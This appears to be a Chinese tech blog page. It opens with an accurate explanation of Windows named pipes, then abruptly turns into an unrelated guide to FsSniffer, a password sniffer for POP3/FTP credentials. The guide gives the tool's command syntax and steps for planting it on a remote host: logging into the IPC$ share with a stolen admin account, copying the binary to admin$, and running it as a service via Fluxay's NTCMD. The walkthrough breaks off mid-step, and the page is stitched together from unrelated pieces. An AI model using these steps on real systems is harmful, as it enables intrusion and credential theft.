
命名管道是通过网络来完成进程间的通信,它屏蔽了底层的网络协议细节。我们在不了解网络协议的情况下,也可以利用命名管道来实现进程间的通信。
1命名管道充分利用了Windows NT和Windows 2000内建的安全机制。
2将命名管道作为一种网络编程方案时,它实际上建立了一个客户机/服务器通信体系,并在其中可靠地传输数据。
3命名管道是围绕Windows文件系统设计的一种机制,采用“命名管道文件系统(Named Pipe File System,NPFS)”接口,因此,客户机和服务器可利用标准的Win32文件系统函数(例如:ReadFile和WriteFile)来进行数据的收发。
4命名管道服务器和客户机的区别在于:服务器是唯一一个有权创建命名管道的进程,也只有它才能接受管道客户机的连接请求。而客户机只能同一个现成的命名管道服务器建立连接。
5命名管道服务器只能在Windows NT或Windows 2000上创建,所以,我们无法在两台Windows 95或Windows 98计算机之间利用管道进行通信。不过,客户机可以是Windows 95或Windows 98计算机,与Windows NT或Windows 2000计算机进行连接通信。
6命名管道提供了两种基本通信模式:字节模式和消息模式。在字节模式中,数据以一个连续的字节流的形式,在客户机和服务器之间流动。而在消息模式中,客户机和服务器则通过一系列不连续的数据单位,进行数据的收发,每次在管道上发出了一条消息后,它必须作为一条完整的消息读入。
FsSniffer只能在Windows 2000中使用,可以捕捉到本机和基于非交换环境局域网的POP3/FTP用户名和密码。
一、本地使用
FSSNIFFER -S <Bind IP> <Port> <Control Password>
Bind IP:指绑定的IP地址,通常就是本地主机IP地址。
Port:控制的端口,以后要通过这个端口登陆上去查看结果。
Control Password:登陆时的密码。
登陆上去后的命令
Show Result:查看捕获的记录
Quit:退出
ShutDown:结束Sniffer的运行
二、远程使用
例如:得到主机2111521881的一个属于管理员组的帐号test:test,首先登录。
D:\>net use \\2111521881\ipc$ test /user:test
The command completed successfully
将fssnifferexe复制到远程主机。(也可以用流光IV中提供的工具“种植者”来做这件事情)
D:\>copy "d:\My Documents\ShadowSniffer\Release\FsSnifferexe" \\2111521881\
dmin$
1 file(s) copied
利用流光IV中的NTCMD启动FsSnifferEXE,并将器安装成为服务
Windows NT/2000 NTCmd Ver 01 for Fluxay IV
Written by Assassin, >
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)